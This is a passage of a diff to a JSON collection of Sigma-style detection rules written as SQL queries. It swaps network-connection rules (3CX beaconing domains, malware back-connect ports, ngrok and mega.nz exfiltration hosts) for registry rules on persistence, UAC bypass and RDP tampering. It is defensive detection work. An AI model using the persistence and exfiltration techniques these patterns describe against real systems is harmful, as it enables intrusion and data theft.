DestinationHostname LIKE '%officeaddons.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officestoragebox.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxsources.com%' ESCAPE '\\' OR DestinationHostname LIKE '%qwepoi123098.com%' ESCAPE '\\' OR DestinationHostname LIKE '%sbmsa.wiki%' ESCAPE '\\' OR DestinationHostname LIKE '%sourceslabs.com%' ESCAPE '\\' OR DestinationHostname LIKE '%visualstudiofactory.com%' 
ESCAPE '\\' OR DestinationHostname LIKE '%zacharryblogs.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" ], - "filename": "net_connection_win_malware_3cx_compromise_beaconing_activity.yml" + "filename": "registry_set_change_sysmon_driver_altitude.yml" }, { - "title": "Suspicious Typical Malware Back Connect Ports", - "id": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", + "title": "Winlogon Notify Key Logon Persistence", + "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", "status": "test", - "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1571" + "attack.persistence", + "attack.t1547.004" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND DestinationPort IN ('4443', '2448', '8143', '1777', '1443', '243', '65535', '13506', '3360', '200', '198', '49180', '13507', '6625', '4444', '4438', '1904', '13505', '13504', '12102', '9631', '5445', '2443', '777', '13394', '13145', '12103', '5552', '3939', '3675', '666', '473', '5649', '4455', '4433', '1817', '100', '65520', '1960', '1515', '743', '700', '14154', '14103', '14102', '12322', '10101', '7210', '4040', '9943')) AND NOT ((NewProcessName LIKE 
'%\\\\Program Files%' ESCAPE '\\') OR ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_malware_backconnect_ports.yml" + "filename": "registry_set_winlogon_notify_key.yml" }, { - "title": "Regsvr32 Network Activity", - "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "title": "Execution DLL of Choice Using WAB.EXE", + "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "description": "This rule detects that the path to the DLL written in the registry is different from the default one. 
Launched WAB.exe tries to load the DLL from Registry.", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.execution", - "attack.t1559.001", "attack.defense_evasion", - "attack.t1218.010" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (NewValue LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" ], - "filename": "net_connection_win_regsvr32_network_activity.yml" + "filename": "registry_set_wab_dllpath_reg_change.yml" }, { - "title": "RDP Over Reverse SSH Tunnel", - "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", - "status": "test", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", - "author": "Samir Bousseaden", + "title": "Persistence Via Hhctrl.ocx", + "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", + "status": "experimental", + "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' 
AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" ], - "filename": "net_connection_win_rdp_reverse_tunnel.yml" + "filename": "registry_set_hhctrl_persistence.yml" }, { - "title": "Excel Network Connections", - "id": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", - "status": "experimental", - "description": "Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", + "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", + "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1203" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", - "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", - "It is highly recommended to baseline your activity and tune out common business use cases." 
+ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationIsIpv6 = 'false') AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.0.0.1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND NewValue LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" ], - "filename": "net_connection_win_excel_outbound_network_connection.yml" + "filename": "registry_set_uac_bypass_winsat.yml" }, { - "title": "Communication To Ngrok.Io", - "id": "18249279-932f-45e2-b37a-8925f2597670", - "status": "experimental", - "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "ETW Logging 
Disabled In .NET Processes - Sysmon Registry", + "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" ], "falsepositives": [ - "Legitimate use of ngrok.io" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue IN ('0', 'DWORD (0x00000000)'))))" ], - "filename": "net_connection_win_ngrok_io.yml" + "filename": "registry_set_dot_net_etw_tamper.yml" }, { - "title": "Suspicious Outbound RDP Connections", - "id": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", - "status": "test", - "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", - "author": "Markus Neis", + "title": "Adwind RAT / JRAT - Registry", + "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", + "status": "experimental", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" - ], - "falsepositives": [ - "Other Remote Desktop RDP tools", - "Domain controller using dns.exe" + "attack.execution", + "attack.t1059.005", + 
"attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((DestinationPort = '3389' AND Initiated = 'true') AND NOT (((NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RTSApp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RTS2App.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ws\\_TunnelService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RSSensor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RemoteDesktopManagerFree.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RemoteDesktopManager.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RemoteDesktopManager64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mRemoteNG.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mRemote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Terminals.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\spiceworks-finder.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FSDiscovery.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FSAssessment.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MobaRTE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Passwordstate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Ranger\\\\SentinelRanger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (NewProcessName = '') OR (NewProcessName = '')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND 
TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND NewValue LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_rdp.yml" + "filename": "registry_set_mal_adwind.yml" }, { - "title": "Microsoft Binary Suspicious Communication Endpoint", - "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", + "title": "RDP Sensitive Settings Changed", + "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", "status": "test", - "description": "Detects an executable in the Windows folder accessing suspicious domains", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.defense_evasion", + "attack.persistence", + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND (DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com/attachments/' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com/raw/' ESCAPE '\\' OR DestinationHostname LIKE '%.ghostbin.co/' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\' 
OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\') AND (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" ], - "filename": 
"net_connection_win_binary_susp_com.yml" + "filename": "registry_set_terminal_server_tampering.yml" }, { - "title": "Communication To Ngrok Tunneling Service", - "id": "1d08ac94-400d-4469-a82f-daee9a908849", - "status": "experimental", - "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "New File Association Using Exefile", + "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", + "status": "test", + "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1567", - "attack.t1568.002", - "attack.t1572", - "attack.t1090", - "attack.t1102", - "attack.s0508" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of ngrok" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND NewValue = 'exefile' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_ngrok_tunnel.yml" + "filename": "registry_set_file_association_exefile.yml" }, { - "title": "Communication To Mega.nz", - "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", - "status": "test", - 
"description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Persistence Via Disk Cleanup Handler - Autorun", + "id": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", + "status": "experimental", + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.persistence" ], "falsepositives": [ - "Legitimate use of mega.nz uploaders and tools" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\Autorun%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\CleanupString%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\PreCleanupString%' ESCAPE '\\') AND (NewValue LIKE '%cmd%' ESCAPE '\\' OR NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%rundll32%' ESCAPE '\\' OR NewValue LIKE '%mshta%' ESCAPE '\\' OR NewValue LIKE '%cscript%' ESCAPE '\\' OR NewValue LIKE '%wscript%' ESCAPE '\\' OR NewValue LIKE '%wsl%' ESCAPE '\\' OR NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_mega_nz.yml" + "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml" }, { - "title": "Dllhost Internet Connection", - "id": "cfed2f44-16df-4bf3-833a-79405198b277", + "title": "Potential Persistence Via GlobalFlags", + "id": "36803969-5421-41ec-b92f-8500f79c23b0", "status": "test", - "description": "Detects Dllhost that communicates with public IP addresses", - "author": "bartblaze", + "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", + "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", "tags": [ + "attack.privilege_escalation", + "attack.persistence", "attack.defense_evasion", - "attack.t1218", - "attack.execution", - "attack.t1559.001" + "attack.t1546.012", + "car.2013-01-002" ], "falsepositives": [ - "Communication to other corporate systems that use IP addresses from public address spaces" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR 
DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\')) OR ((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" ], - "filename": "net_connection_win_dllhost_net_connections.yml" + 
"filename": "registry_set_persistence_globalflags.yml" }, { - "title": "Script Initiated Connection", - "id": "08249dc0-a28d-4555-8ba5-9255a198e08c", - "status": "experimental", - "description": "Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads.", + "title": "Registry Modification to Hidden File Extension", + "id": "5df86130-4e95-4a54-90f7-26541b40aec2", + "status": "test", + "description": "Hides the file extension through modification of the registry", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Legitimate scripts" + "Administrative scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\' AND NewValue = 'DWORD (0x00000002)')))" ], - "filename": "net_connection_win_script.yml" + "filename": "registry_set_hidden_extention.yml" }, { - "title": "Suspicious Program Location with Network Connections", - "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", - "status": "test", - "description": "Detects programs with network connections running in suspicious files system locations", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "New RUN Key Pointing to Suspicious Folder", + "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", + "status": 
